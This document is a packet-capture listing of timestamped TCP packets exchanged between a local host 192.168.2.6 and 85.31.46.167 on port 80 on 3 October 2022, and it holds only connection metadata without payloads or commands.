Oct 3, 2022 17:42:20.757793903 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757807970 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757826090 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757837057 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757858038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757874012 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757888079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757901907 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757925034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757931948 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757953882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.757970095 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.757986069 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758001089 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758018017 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758032084 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758050919 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758064032 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758080959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758095026 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758111954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758127928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758142948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758156061 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758172989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758188009 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758204937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758218050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758234978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758249044 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758265972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758277893 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758297920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758307934 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758331060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758343935 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758363008 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758374929 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758394003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758407116 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758424997 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758440018 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758456945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758471012 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758487940 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758503914 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758522034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758534908 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758553982 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758568048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758584023 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758595943 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758614063 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758627892 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758644104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758658886 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758677006 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758694887 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758708954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758724928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758738041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758754015 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758770943 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758789062 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758805990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758812904 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758843899 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758852005 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758892059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758893967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758938074 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.758939981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758974075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.758986950 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759005070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759016991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759038925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759049892 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759074926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759083986 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759109020 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759119987 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759144068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759155035 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759176970 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759191036 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759208918 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759219885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759243011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759252071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759277105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759287119 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759310007 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759320021 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759342909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759352922 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759376049 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759386063 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759409904 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759419918 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759443998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759455919 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759478092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759490967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759511948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759522915 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759546041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759560108 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759579897 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759596109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759613991 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759629011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759646893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759660959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759680033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759696960 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759716034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759731054 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759748936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759762049 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759783030 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759797096 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759815931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759829998 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759850025 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759864092 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759882927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759897947 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759917021 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759933949 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759951115 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.759967089 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.759985924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760000944 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760020018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760032892 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760057926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760066986 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760092974 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760111094 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760126114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760140896 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760160923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760174036 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760195971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760210037 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760230064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760242939 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760263920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760289907 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760298014 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760320902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760334015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760344028 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760369062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760399103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760404110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760413885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760441065 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760473967 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760483027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760509968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760526896 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760544062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760560989 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760577917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760591030 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760613918 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760620117 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760648966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760659933 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760683060 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760695934 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760715961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760734081 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760751963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.760765076 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.760801077 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.761349916 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.778136969 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.778173923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.778248072 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.787875891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.787897110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.787949085 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.787950039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.787972927 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.787996054 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.787996054 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.787997961 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788012981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788023949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788039923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788050890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788063049 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788089991 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788090944 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788098097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788110971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788136005 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788136959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788151979 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788166046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788180113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788182974 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788204908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788211107 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788234949 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788237095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788264036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788268089 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788289070 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788290977 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788312912 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788319111 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788330078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788345098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788358927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788372993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788384914 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788398981 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788413048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788424969 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788436890 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788451910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788475037 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788481951 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788503885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788512945 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788523912 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788527966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788553953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788578033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788578987 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788599968 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788604975 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788623095 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788633108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788659096 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788660049 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788678885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788696051 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788705111 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788705111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788731098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788741112 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788758039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788772106 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788784027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788805962 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788810015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788836002 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788836002 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788861990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788876057 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788887978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788908958 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788912058 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788937092 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788940907 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788960934 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788968086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.788983107 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.788995028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789011955 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789021015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789047003 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789052010 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789077044 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789078951 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789092064 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789113045 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789118052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789139986 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789146900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789171934 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789180040 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789199114 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789203882 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789227962 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789231062 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789243937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789252996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789269924 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789275885 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789299965 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789302111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789329052 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789333105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789359093 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789361000 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789381027 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789392948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789407969 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789412975 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789437056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789450884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789452076 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789479971 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789491892 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789505005 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789524078 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789532900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789551020 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789561033 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789580107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789582014 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789603949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789606094 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789630890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789632082 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789650917 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789658070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789681911 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789688110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789705038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789716959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789736032 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789751053 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789751053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789777040 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789787054 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789792061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789809942 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789820910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789841890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789863110 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789884090 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789902925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789931059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789931059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:20.789958954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:20.789969921 CEST	49711	80	192.168.2.6	85.31.46.167
